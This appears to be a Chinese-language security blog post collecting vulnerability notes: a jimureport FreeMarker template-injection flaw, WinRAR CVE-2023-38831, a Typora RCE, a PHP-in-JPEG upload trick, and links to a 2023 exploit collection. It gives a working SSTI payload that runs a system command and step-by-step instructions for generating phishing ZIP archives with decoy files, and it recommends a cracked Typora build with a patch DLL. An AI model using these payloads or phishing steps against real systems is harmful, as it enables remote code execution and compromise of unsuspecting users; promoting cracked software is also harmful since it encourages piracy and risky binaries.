1.漏洞描述 jimureport ≤v1.6.0
具有 SSTI(服务器端模板注入),攻击者可利用该漏洞远程执行任意代码,控制服务器权限。<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc").start ()}
任意代码执行,应该也能扩充成注入内存马等操作。 具体操作流程,触发点可以查看原文
1.漏洞描述 当用户尝试查看 ZIP 存档中的良性文件时,WinRAR 6.23
之前的版本允许攻击者执行任意代码。出现此问题的原因是 ZIP 存档可能包含良性文件(例如普通 .JPG 文件)以及与良性文件同名的文件夹,并且处理该文件夹的内容(可能包括可执行内容)在尝试仅访问良性文件期间。 CVE-2023-38831 该漏洞于 2023 年 4 月至 2023 年 8 月期间在野外被利用。 2.漏洞利用 1. 将诱饵文件和恶意脚本文件放置在当前目录下,诱饵文件建议使用图片(.png、jpg)或文档(.pdf)。 2. 将script.bat脚本文件中的pdf修改为我们的诱饵文件(但得注意编码问题)。 3. 执行这个漏洞利用程序的命令生成我们的钓鱼zip文件。python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>
4.点开压缩包就RCE
最近Typora <1.6.7
会有RCE问题,并且目前官网的最新版本就是1.6.7
,所以找了一个最新的破解版,打开恶意Markdown也不会RCE了。 Typora1.6.7按照包下载 破解补丁winmm.dll放在安装目录 Typora RCE威胁情报 最后再推荐一个发现的很好看的一个主题:dyzj
昨天在逛微信群的时候发现有人提出了一个这样的问题: 上传处可以上传任意的PHP文件,但是会对这些文件做压缩,导致存放在图片内部的PHP代码无法完整的传到对方的服务器上。 最终是依赖这个项目解决的 php-jpeg-injector 做记录,以后遇到了找这个项目试一试。
据说这个是市面上最全版本的,回来有空整理一下,并建立专属的HW漏洞库。这些新Nday
感觉比较好用一些,尤其是海康什么的,终于是把其余的几个端点发出来了。
2023hvvday POC集合.pdf
还有一个别人整的语雀在线版本的
2023近期活动期间0day